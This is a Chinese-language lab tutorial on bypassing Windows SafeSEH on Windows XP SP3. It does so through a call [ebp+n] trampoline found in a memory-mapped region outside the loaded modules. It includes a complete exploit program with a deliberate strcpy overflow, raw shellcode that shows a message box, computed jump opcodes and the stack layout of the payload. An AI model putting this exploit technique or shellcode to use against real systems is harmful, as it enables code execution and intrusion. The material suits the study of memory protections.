内存保护机制及绕过方法——利用未启用SafeSEH模块绕过SafeSEH

利用加载模块之外的地址绕过safeSEH

前言：文章涉及的概念在之前的文章中都有过详细的讲解

⑴.  原理分析：

当程序加载进内存中后，处理PE文件（exe，dll），还有一些映射文件，safeSEH是不会对这些映射文件做安全检查。所以如果在这些映射文件中找到一些跳板地址（意义见之前的绕过利用/GS机制），就可以达到控制EIP的目的，执行恶意代码。

 

如上图，可以看到在PE文件之前有很多map（映射文件），safeSEH是不会对这些文件做安全检测的。

⑵．环境准备：

i．实验代码：

#include "stdafx.h"

#include <string.h>

#include <windows.h>

char shellcode[]=

"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"

"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"

"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"

"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"

"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"

"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"

"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"

"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"

"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"

"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"

"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xE9\x2B\xFF\xFF\xFF\x90\x90\x90"// machine code of far jump and \x90

"\xEB\xF6\x90\x90"// machine code of short jump and \x90

"\x0B\x0B\x29\x00"// address of call [ebp+30] in outside memory

;

 

DWORD MyException(void)

{

     printf("There is an exception");

     getchar();

     return 1;

}

void test(char * input)

{

     char str[200];

     strcpy(str,input);

    int zero=0;

     __try

     {

         zero=1/zero;

     }

     __except(MyException())

     {

     }

}

int _tmain(int argc, _TCHAR* argv[])

{

     //__asm int 3

     test(shellcode);

     return 0;

}

 

ii．测试环境：

测试平台：window xp with sp3（win7 上找不到可以利用的map文件）。

编译环境：

 

DEP，ASLR保护机制关闭。

⑶．调试分析：

i．程序执行到test函数，参数入栈，call test函数：

       

Shellcode地址0x0012ff78

Eip:0x0012ff74

ii．初始化test哈数，Ebp:0x0012ff70：

       

iii．异常处理函数指针入栈，

FS:[0]指针 = 0x0012ff60

 

异常处理函数指针 = 0x0012ff64

 

iv．缓冲区起始地址 = 0x0012fe88

 

⑷．攻击过程：

i．确定shellcode大小：

回顾，攻击思路，我们是希望将异常处理函数的指针覆盖成恶意代码（弹出对话框）的指针，那么，

Size(shellcode) =最近的异常处理函数指针–缓冲区起始地址 + 4 = 220(十进制)。

ii.生成恶意代码（弹出对话框）：

这里偷个懒，就直接用网上的恶意代码了，长度是168字节，效果是糖醋对话框。

iii．跳板地址

问题：我们以前的跳板都是从栈低地址向栈高地址条的，而这一次，我们的恶意代码的起始地址是小于异常处理函数的，那么之前一直用的PPR跳板就不能用了，这要怎么办？

这就要考虑到SEH处理机制了，到异常处理函数不能处理异常时，会怎么办?异常会局部展开，调用SEH链的指针，寻找下一个异常处理节点，处理异常。

好，我们这里寻找可以实现这个目标的指令地址。

使用OllyFindaddr插件，寻找call [ebp+n]指令，得到下图：

 

    红色的一行显示，该指令不在已加载的模块中，

    指令地址 = 0x00290b0b

   

iv．使EIP指向恶意代码执行指针

控制EIP之后，我们要让EIP跳到恶意代码执行处，四字节的长度不能实现一个长条，只能先用一个短跳跳到长跳地址，在由长跳跳跳到恶意代码执行处。

短跳机器码：EB 一字节的距离 \x90\x90

长跳机器码：E9 四字节的距离 \x90\x90\x90

v．跳转距离计算

跳转距离 =目的地址–跳转指令起始地址– 跳转指令长度(单位：字节)

短跳距离 = 0x0012ff5c – 0x0012ff60 – 2 = F6（起始地址 – 目的地址是负数要取补码）。

长跳距离 = 0x0012fe88 – 0x0012ff5c – 5 = FFFFFF2b

短跳指令：\xEB\xf6\x90\x90

长跳指令：\xe9\x2b\xff\xff\xff\x90\x90\x90

vi．设计shellcode结构

恶意代码（弹对话框） 168字节

填充物 40字节

长跳指令 8字节

短跳指令 4字节

跳板指令 4字节

栈低地址                                               　　　　　　　　　　　　　　 栈高地址

 

vi．执行攻击

 

成功。